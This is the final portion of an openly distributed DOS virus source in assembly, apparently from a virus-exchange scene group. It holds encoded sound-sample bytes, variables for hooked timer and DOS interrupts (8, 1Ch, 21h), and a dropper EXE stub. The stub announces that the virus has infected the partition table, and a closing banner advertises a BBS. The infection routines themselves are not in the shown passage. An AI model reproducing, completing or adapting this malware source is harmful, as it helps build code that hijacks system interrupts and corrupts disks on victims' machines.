06dh,0e9h,026h,0f1h,0f2h,027h,0f3h,0a4h,0b7h,063h,060h,01fh,0c7h,0f1h,036h,0cfh db 0b0h,03eh,00dh,0b0h,07eh,00bh,0d0h,07bh,01bh,0c0h,07ch,01bh,064h,06ch,01fh,024h db 064h,00dh,036h,066h,04dh,093h,023h,06dh,01bh,003h,02dh,09dh,007h,085h,09dh,087h db 0c4h,08eh,087h,0c4h,0c6h,0c3h,0c4h,0c7h,043h,066h,043h,003h,0e6h,043h,081h,0b2h db 065h,081h,0b2h,061h,081h,0b3h,063h,081h,0d3h,033h,0c1h,0f1h,031h,091h,0b1h,033h db 0b1h,0f1h,033h,0a1h,0e1h,023h,021h,0e1h,023h,063h,063h,066h,066h,0e3h,066h,0e4h db 0c7h,04dh,0cdh,08fh,013h,05bh,09eh,066h,064h,0ech,0cch,0c9h,0ddh,099h,091h,0bbh db 017h,04fh,0d8h,02eh,00fh,032h,07eh,01eh,068h,0f8h,079h,091h,0f0h,0f7h,046h,0c5h db 0deh,09fh,09fh,0edh,07ch,02fh,0b3h,034h,05eh,04ch,099h,0b9h,0bbh,032h,0cah,0cch db 0dbh,009h,013h,00dh,034h,02eh,064h,0d8h,0b9h,0a1h,023h,064h,08ch,08dh,092h,032h db 03ch,0c8h,0c8h,0fah,037h,023h,0d0h,09ch,00eh,0c2h,0f0h,066h,04bh,0c1h,0d9h,01bh db 026h,064h,0cch,09bh,007h,033h,06ch,01ch,099h,0e0h,072h,065h,083h,089h,01dh,00eh db 024h,064h,078h,0b1h,091h,0e6h,0cch,08fh,012h,032h,038h,049h,090h,0f3h,066h,047h db 08dh,019h,01eh,034h,04ch,0d9h,0b3h,033h,0e6h,0cch,0c9h,019h,062h,06ch,06dh,099h db 0b1h,0b6h,066h,0c6h,0f8h,09bh,01dh,0c8h,0fch,033h,033h,0b1h,0ech,0cdh,0cdh,099h db 03ah,037h,064h,0e8h,0e7h,083h,0c1h,0cfh,007h,087h,0ddh,01fh,00fh,032h,03eh,01eh db 074h,07ch,07ch,0e0h,0f8h,0f9h,0c1h,0f9h,077h,043h,0e9h,0fbh,083h,0e0h,0e5h,087h db 082h,099h,00fh,016h,073h,023h,001h,0f1h,013h,002h,032h,006h,002h,0f2h,066h,0c0h db 0e2h,062h,046h,066h,00eh,00ch,0e6h,026h,040h,0e4h,07ch,000h,0e2h,06ch,001h,0c2h db 022h,062h,0e6h,00ch,040h,036h,01eh,002h,0e2h,036h,020h,0f2h,03ch,038h,0f3h,036h db 060h,0d3h,013h,042h,07bh,01bh,001h,0f9h,03fh,02ch,0f9h,01bh,0b0h,079h,091h,0b1h db 0f9h,01fh,083h,0f9h,09fh,003h,0fdh,09dh,09bh,0bch,0ddh,0dbh,0fch,0ddh,09bh,0fch db 0ech,069h,0fch,0dch,0fdh,09ch,0cch,0f9h,03eh,06ch,0bch,0bch,02eh,024h,0feh,066h db 034h,0deh,026h,036h,01eh,066h,066h,04eh,066h,02eh,04fh,017h,01fh,027h,033h,01fh db 00fh,09bh,01ah,04fh,099h,039h,027h,088h,0d8h,037h,098h,083h,007h,0cch,018h,012h db 04ch,01ch,006h,0a4h,036h,00eh,054h,01eh,01fh,01eh,00eh,007h,09eh,00eh,04eh,0ceh db 00fh,007h,087h,007h,087h,08fh,007h,003h,047h,007h,083h,0c3h,003h,083h,0e3h,081h db 081h,0c3h,0a3h,0e1h,0e3h,0c1h,0f1h,0f1h,0c0h,0e0h,0f9h,0c0h,0f0h,070h,0f0h,0f8h db 0f8h,0f0h,0f8h,07ch,0c0h,0d8h,018h,01ch,01ch,06ch,0fch,03fh,025h,0cch,04ch,00ch db 0ceh,06eh,03ch,0e2h,0e3h,0e3h,0e7h,0c7h,08ch,073h,032h,074h,0f0h,0f1h,0b2h,070h db 0f2h,078h,078h,078h,078h,078h,078h,038h,038h,03ch,03eh,01ch,03ch,01eh,01ch,01ch db 01eh,01fh,01eh,00fh,00eh,00eh,00fh,08fh,00fh,007h,087h,087h,043h,083h,0c3h,0c3h db 0c3h,0c3h,0c3h,0c3h,0c3h,0c1h,0e1h,0c3h,0e0h,0f0h,0e0h,0e0h,0f0h,0f0h,0e0h,0f0h db 070h,0f0h,0f8h,078h,070h,078h,070h,070h,03ch,03ch,038h,03ch,03ch,01ch,03ch,03ch db 01ch,01eh,01ch,09ch,01eh,01ch,01eh,01fh,01ch,00eh,01fh,01ch,00fh,01fh,01eh,00fh db 00fh,09fh,007h,00fh,0c7h,007h,00fh,087h,017h,087h,087h,087h,0c7h,093h,087h,0c3h db 0d3h,083h,0c3h,0d1h,0c3h,0e1h,0f9h,0c3h,0e1h,0e8h,0c7h,0e0h,0f8h,0e3h,0f8h,0f6h db 0e3h,0e8h,07eh,0e3h,0e8h,07eh,063h,0e4h,0f9h,0e3h,0e2h,0dbh,0e1h,0e1h,0c8h,0e0h db 070h,0cdh,0f0h,0f0h,0cch,0f1h,0f8h,0c1h,0f0h,0f0h,0f1h,038h,038h,073h,038h,03ch db 073h,038h,03ch,038h,01ch,01eh,03ah,01eh,01eh,03ch,08eh,01eh,01ch,08eh,00fh,01fh db 08eh,00fh,01fh,00eh,00fh,01eh,006h,007h,00eh,007h,04eh,049h,0e2h,036h,00dh,0e6h db 028h,0c1h,0f3h,006h,004h,0b3h,007h,001h,0a9h,00fh,083h,095h,007h,087h,0c7h,083h db 081h,0e7h,083h,093h,0b3h,083h,0c1h,0e1h,0c1h,0e1h,0e3h,0c1h,0c0h,0d1h,0c1h,0e0h db 0f0h,0c0h,0e0h,0f8h,0e0h,060h,070h,0e8h,0f8h,078h,0f0h,07ch,07ch,070h,038h,03eh db 070h,03ch,01ch,03ch,03eh,03eh,03ch,03eh,01fh,030h,036h,006h,007h,007h,01bh,03fh db 00fh,0c9h,073h,013h,003h,0b3h,09bh,08fh,038h,0bch,0f8h,0f9h,0f1h,0e3h,01ch,0cch db 09dh,03ch,03ch,06ch,09ch,03ch,09eh,01eh,01eh,01eh,01eh,01eh,00eh,00eh,00fh,00fh db 087h,00fh,007h,087h,007h,007h,087h,0c7h,083h,0c3h,083h,083h,0e3h,0c3h,0c1h,0e1h db 0f1h,0d1h,0e0h,0f0h,0f0h,0f0h,0f0h,0f0h,0f0h,0f0h,0f0h,078h,070h,0f8h,03ch,038h db 038h,03ch,03ch,038h,03ch,01ch,03ch,03eh,01eh,01ch,03eh,01ch,01ch,00fh,00fh,00eh db 00fh,00fh,007h,00fh,00fh,007h,007h,087h,027h,007h,087h,007h,087h,0c7h,003h,087h db 0c7h,003h,0c7h,0c7h,083h,0c3h,0e7h,0c1h,0c3h,0f1h,0c1h,0c3h,0e1h,0c5h,0e1h,0e1h db 0e1h,0f1h,0ech,0e1h,0f0h,0f4h,0e0h,0f0h,0f4h,070h,0f8h,07eh,070h,0f8h,07ah,031h db 0f8h,03eh,038h,0feh,03dh,0b8h,0fah,01fh,0b8h,0fah,01fh,098h,0f9h,03eh,078h,0f8h db 0b6h,0f8h,0f8h,072h,038h,01ch,033h,07ch,03ch,033h,03ch,07eh,038h,07ch,03eh,03ch db 04eh,00eh,01ch,0ceh,00fh,01ch,0ceh,00fh,00eh,007h,007h,08eh,087h,087h,08fh,063h db 087h,087h,023h,083h,0c7h,0e3h,083h,0c7h,0c3h,083h,0c7h,081h,081h,0c0h,0f9h,09bh db 093h,079h,08dh,083h,079h,08bh,030h,07ch,0c9h,0c3h,02ch,0c1h,0c0h,07ah,043h,0e0h db 0e5h,041h,0e1h,0f1h,0e0h,0e0h,0f9h,0e0h,0e4h,0ech,0e0h,0f0h,078h,070h,078h,078h db 0f0h,070h,034h,070h,078h,03ch,030h,038h,03eh ; ,038h SampleEnd equ this byte ;------------------------------------------------------------------------------ ; ; Variables ; ;------------------------------------------------------------------------------ Active db -1 ActiveYear dw -1 ActiveDate dw -1 OldInt8 equ this dword ; orginal interrupt 8 OldInt8o dw -1 OldInt8s dw -1 OldInt1C equ this dword ; orginal interrupt 1ch OldInt1Co dw -1 OldInt1Cs dw -1 OldInt21 equ this dword ; orginal interrupt 21h OldInt21o dw -1 OldInt21s dw -1 Count dw -1 ; timer count SampleOffset dw -1 ; Used to make sound SampleBit db -1 SampleFlag db -1 Handle dw 8 dup(-1) ; Filehandles cseg ends ;------------------------------------------------------------------------------ ; ; Orginal EXE-file ; ;------------------------------------------------------------------------------ mseg segment public 'code' assume cs:mseg, ds:mseg, es:mseg db 'MZ' ; header dw PrgSize ; PartPage dw 1 ; PageCount dw 0 ; relocation items = 0 dw 0 ; headersize = 0h dw 80h ; minimum memory dw 0ffffh ; maximum memory dw (PrgSize+15)/10h ; ss dw 7feh ; sp dw 0 ; chksum dw offset Orginal ; ip dw 0 ; cs dw 1ch ; offset relocation table dw 0 ; overlay number Orginal: mov ah,9 ; display warning push cs pop ds mov dx,offset Warning int 21h mov ax,4c00h int 21h ; terminate Warning db 13,10 db 'WARNING:',13,10 db 13,10 db 'Yeah virus has now infected the partition table !!!!!',13,10 db 13,10 db '$' mseg ends sseg segment stack 'stack' db 800h dup(?) sseg ends end Main  ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; ÄÄÄÄÄÄÄÄÄÄÄ> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <ÄÄÄÄÄÄÄÄÄÄÄ ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ